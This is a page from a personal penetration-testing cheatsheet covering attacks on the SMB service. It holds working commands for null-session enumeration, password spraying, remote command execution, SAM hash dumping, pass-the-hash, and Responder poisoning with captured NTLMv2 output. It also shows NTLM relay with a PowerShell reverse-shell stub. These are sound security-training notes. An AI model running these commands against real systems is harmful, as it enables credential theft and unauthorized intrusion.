📒
My Pentesting Cheatsheet
  • Home
  • Commands Only Summary
    • Some other cool websites
  • Preparation
    • Documents
    • Contract - Checklist
    • Rules of Engagement - Checklist
    • Contractors Agreement - Checklist for Physical Assessments
  • Information Gathering
  • Vulnerability Assessment
  • Pentesting Machine
  • Enumeration
    • NMAP Scan types explained
    • Firewall and IDS/IPS Evasion
  • Footprinting
    • Google Dorks
    • Samba (smb)
    • NFS
    • DNS
    • SMTP
    • IMAP/POP3
    • SNMP
    • MySQL
    • MSSQL
    • Oracle TNS
    • IPMI
    • SSH
    • RDP
    • WinRM
  • Web Information Gathering
    • Whois
    • DNS & Subdomains
    • Fingerprinting
    • Crawlers
    • Search Engine Discovery
    • Automating Recon
  • Vulnerability Assessment
  • File Transfers
    • Windows Target
    • Linux Target
    • Transferring Files with Code
    • Miscellaneous File Transfer Methods
    • Protected Files Transfer
    • Catching Files over HTTP/S (Nginx)
    • Living Off The Land
    • Evading Detection
  • Shells & Payloads
    • Reverse Shells + Bind + Web
  • Password Attacks
    • John the ripper
    • Remote password attacks
    • Password mutations
    • Password Reuse / Default Passwords
    • Windows Local Password Attacks
    • Linux Local Password Attacks
    • Windows Lateral Movement
    • Cracking Files
  • Attacking Common Services
    • FTP
    • SMB
    • SQL
    • RDP
    • DNS
    • Email Services
  • Pivoting, Tunneling, and Port Forwarding
    • Choosing The Dig Site & Starting Our Tunnels
    • Playing Pong with Socat
    • Pivoting Around Obstacles
    • Branching Out Our Tunnels
    • Double Pivots
    • Final considerations
  • Active Directory Enumeration & Attacks
    • Initial Enumeration
    • Sniffing out a Foothold
    • Sighting In, Hunting For A User
    • Spray Responsibly
    • Deeper Down the Rabbit Hole
    • Kerberoasting - Cooking with Fire
    • Access Control List (ACL)
    • Advanced Privilege Escalation in Active Directory: Stacking The Deck
    • Domain trusts
    • Domain Trusts - Cross Forest
    • Defensive Considerations
  • Using Web Proxies
  • Login Brute Forcing
  • SQL Injection Fundamentals
    • Mitigating SQL Injection
  • SQLMap Essentials
    • Building Attacks
    • Database Enumeration
    • Advanced SQLMap Usage
  • Cross-Site Scripting (XSS)
    • Prevention
  • File Inclusion
  • File Upload Attacks
    • Basic Exploitation
    • Bypassing Filters
    • Other Upload Attacks
    • Prevention
  • Command Injections
    • Exploitation
    • Filter Evasion
  • Web Attacks
    • HTTP Verb Tampering
    • Insecure Direct Object References (IDOR)
    • XML External Entity (XXE) Injection
    • GraphQL
  • Attacking Common Applications
    • Application Discovery & Enumeration
    • Content Management Systems (CMS)
    • Servlet Containers/Software Development
    • Infrastructure/Network Monitoring Tools
    • Customer Service Mgmt & Configuration Management
    • Common Gateway Interfaces
    • Thick Client Applications
    • Miscellaneous Applications
  • Privilege Escalation
    • Linux Privilege Escalation
      • Information Gathering
      • Environment-based Privilege Escalation
      • Service-based Privilege Escalation
      • Linux Internals-based Privilege Escalation
      • Recent 0-Days
      • Linux Hardening
    • Windows Privilege Escalation
      • Getting the Lay of the Land
      • Windows User Privileges
      • Windows Group Privileges
      • Attacking the OS
      • Credential Theft
      • Restricted Environments
      • Additional Techniques
      • Dealing with End of Life Systems
      • Windows Hardening
    • Windows (old page)
  • Documentation & Reporting
    • Preparation
    • Reporting
  • Attacking Enterprise Networks
    • Pre-Engagement
    • External Testing
    • Internal Testing
    • Lateral Movement & Privilege Escalation
    • Wrapping Up
  • Deobfuscation
  • Metasploit
    • msfvenom
  • Custom compiled files
  • XSS
  • Azure AD (Entra ID)
Powered by GitBook
On this page
  • Enumeration
  • Misconfigurations
  • File Share
  • Remote Procedure Call (RPC)
  • Protocol Specifics Attacks
  • SMB
  • Enumerating Logged-on Users
  • Extract Hashes from SAM Database
  • Pass-the-Hash (PtH)
  • Forced Authentication Attacks
  • RPC
  1. Attacking Common Services

SMB

Server Message Block

it was designed to run on top of NetBIOS over TCP/IP (NBT) using TCP port 139 and UDP ports 137 and 138.

However, with Windows 2000, Microsoft added the option to run SMB directly over TCP/IP on port 445 without the extra NetBIOS layer.

Enumeration

sudo nmap 10.129.14.128 -sV -sC -p139,445

Misconfigurations

File Share

SMB can be configured not to require authentication, which is often called a null session. Instead, we can log in to a system with no username or password.

smbclient -N -L //<IP>

list of the server's shares with the option -L, and using the option -N

Smbmap is another tool that helps us enumerate network shares and access associated permissions. An advantage of smbmap is that it provides a list of permissions for each shared folder.

smbmap -H <IP>

Using smbmap with the -r or -R (recursive) option, one can browse the directories:

smbmap -H <IP> -r notes
smbmap -H <IP> --download "notes\note.txt
smbmap -H <IP> --upload test.txt "notes\test.txt"

Remote Procedure Call (RPC)

We can use the rpcclient tool with a null session to enumerate a workstation or Domain Controller.

rpcclient -U'%' <IP>
> enumdomusers

Enum4linux is another utility that supports null sessions, and it utilizes nmblookup, net, rpcclient, and smbclient to automate some common enumeration from SMB targets such as:

  • Workgroup/Domain name

  • Users information

  • Operating system information

  • Groups information

  • Shares Folders

  • Password policy information

./enum4linux-ng.py <IP> -A -C

Protocol Specifics Attacks

crackmapexec smb <IP> -u <user or userlist> -p <password or passwordlist> --local-auth

By default CME will exit after a successful login is found. Using the --continue-on-success flag will continue spraying even after a valid password is found. it is very useful for spraying a single password against a large user list. Additionally, if we are targetting a non-domain joined computer, we will need to use the option --local-auth. For a more detailed study Password Spraying see the Active Directory Enumeration & Attacks module.

SMB

When attacking a Windows SMB Server, our actions will be limited by the privileges we had on the user we manage to compromise. If this user is an Administrator or has specific privileges, we will be able to perform operations such as:

  • Remote Command Execution

  • Extract Hashes from SAM Database

  • Enumerating Logged-on Users

  • Pass-the-Hash (PTH)

impacket-psexec administrator:'Password123!'@<IP>
crackmapexec smb <IP> -u Administrator -p 'Password123!' -x 'whoami' --exec-method smbexec

If the--exec-method is not defined, CrackMapExec will try to execute the atexec method, if it fails you can try to specify the --exec-method smbexec.

Enumerating Logged-on Users

Imagine we are in a network with multiple machines. Some of them share the same local administrator account. In this case, we could use CrackMapExec to enumerate logged-on users on all machines within the same network 10.10.110.17/24, which speeds up our enumeration process.

crackmapexec smb <NetIP>/24 -u administrator -p 'Password123!' --loggedon-users

Extract Hashes from SAM Database

crackmapexec smb <IP> -u administrator -p 'Password123!' --sam

Pass-the-Hash (PtH)

We can use a PtH attack with any Impacket tool, SMBMap, CrackMapExec, among other tools. Here is an example of how this would work with CrackMapExec:

crackmapexec smb <IP> -u Administrator -H <HASH>

Forced Authentication Attacks

responder -I <interface name>

When a user or a system tries to perform a Name Resolution (NR), a series of procedures are conducted by a machine to retrieve a host's IP address by its hostname. On Windows machines, the procedure will roughly be as follows:

  • The hostname file share's IP address is required.

  • The local host file (C:\Windows\System32\Drivers\etc\hosts) will be checked for suitable records.

  • If no records are found, the machine switches to the local DNS cache, which keeps track of recently resolved names.

  • Is there no local DNS record? A query will be sent to the DNS server that has been configured.

  • If all else fails, the machine will issue a multicast query, requesting the IP address of the file share from other machines on the network.

Suppose a user mistyped a shared folder's name \\mysharefoder\ instead of \\mysharedfolder\. In that case, all name resolutions will fail because the name does not exist, and the machine will send a multicast query to all devices on the network, including us running our fake SMB server. This is a problem because no measures are taken to verify the integrity of the responses. Attackers can take advantage of this mechanism by listening in on such queries and spoofing responses, leading the victim to believe malicious servers are trustworthy. This trust is usually used to steal credentials.

Example output of responder:

[+] Listening for events... 

[*] [NBT-NS] Poisoned answer sent to 10.10.110.17 for name WORKGROUP (service: Domain Master Browser)
[*] [NBT-NS] Poisoned answer sent to 10.10.110.17 for name WORKGROUP (service: Browser Election)
[*] [MDNS] Poisoned answer sent to 10.10.110.17   for name mysharefoder.local
[*] [LLMNR]  Poisoned answer sent to 10.10.110.17 for name mysharefoder
[*] [MDNS] Poisoned answer sent to 10.10.110.17   for name mysharefoder.local
[SMB] NTLMv2-SSP Client   : 10.10.110.17
[SMB] NTLMv2-SSP Username : WIN7BOX\demouser
[SMB] NTLMv2-SSP Hash     : demouser::WIN7BOX:997b18cc61099ba2:3CC46296B0CCFC7A231D918AE1DAE521:0101000000000000B09B51939BA6D40140C54ED46AD58E890000000002000E004E004F004D00410054004300480001000A0053004D0042003100320004000A0053004D0042003100320003000A0053004D0042003100320005000A0053004D0042003100320008003000300000000000000000000000003000004289286EDA193B087E214F3E16E2BE88FEC5D9FF73197456C9A6861FF5B5D3330000000000000000

All saved Hashes are located in Responder's logs directory (/usr/share/responder/logs/). We can copy the hash to a file and attempt to crack it using the hashcat module 5600.

If you notice multiples hashes for one account this is because NTLMv2 utilizes both a client-side and server-side challenge that is randomized for each interaction. This makes it so the resulting hashes that are sent are salted with a randomized string of numbers. This is why the hashes don't match but still represent the same password.

On responder: First, we need to set SMB to OFF in our responder configuration file (/etc/responder/Responder.conf).

cat /etc/responder/Responder.conf | grep 'SMB ='

SMB = Off

Then we execute impacket-ntlmrelayx with the option --no-http-server, -smb2support, and the target machine with the option -t. By default, impacket-ntlmrelayx will dump the SAM database, but we can execute commands by adding the option -c.

impacket-ntlmrelayx --no-http-server -smb2support -t <IP>
impacket-ntlmrelayx --no-http-server -smb2support -t <IP> -c 'powershell -e [...]'

RPC

In the Footprinting page, we discuss how to enumerate a machine using RPC. Apart from enumeration, we can use RPC to make changes to the system, such as:

  • Change a user's password.

  • Create a new domain user.

  • Create a new shared folder.

PreviousFTPNextSQL

Last updated 5 months ago

We can use this or review the complete list of all these functions found on the of the rpcclient.

The was written in Perl and .

If a null session is not enabled, we will need credentials to interact with the SMB protocol. Two common ways to obtain credentials are and .

is the fork and continuation of crackmapexec

We can download PsExec from , or we can use some Linux implementations:

- Python PsExec like functionality example using .

- A similar approach to PsExec without using . The technique is described here. This implementation goes one step further, instantiating a local SMB server to receive the output of the commands. This is useful when the target machine does NOT have a writeable share available.

- This example executes a command on the target machine through the Task Scheduler service and returns the output of the executed command.

- includes an implementation of smbexec and atexec.

- Ruby PsExec implementation.

We can also abuse the SMB protocol by creating a fake SMB Server to capture users' .

The most common tool to perform such operations is the Responder. is an LLMNR, NBT-NS, and MDNS poisoner tool with different capabilities, one of them is the possibility to set up fake services, including SMB, to steal NetNTLM v1/v2 hashes.

These captured credentials can be cracked using or relayed to a remote host to complete the authentication and impersonate the user.

If we cannot crack the hash, we can potentially relay the captured hash to another machine using or Responder

We can create a PowerShell reverse shell using , set our machine IP address, port, and the option Powershell #3 (Base64).

Keep in mind that some specific configurations are required to allow these types of changes through RPC. We can use the or from the SANS Institute to explore this further.

cheat sheet from the SANS Institute
man page
original tool
rewritten by Mark Lowe in Python
brute forcing
password spraying
Netexec
Microsoft website
Impacket PsExec
RemComSvc
Impacket SMBExec
RemComSvc
Impacket atexec
CrackMapExec
Metasploit PsExec
NetNTLM v1/v2 hashes
Responder
hashcat
impacket-ntlmrelayx
MultiRelay.py
https://www.revshells.com/
rpclient man page
SMB Access from Linux Cheat Sheet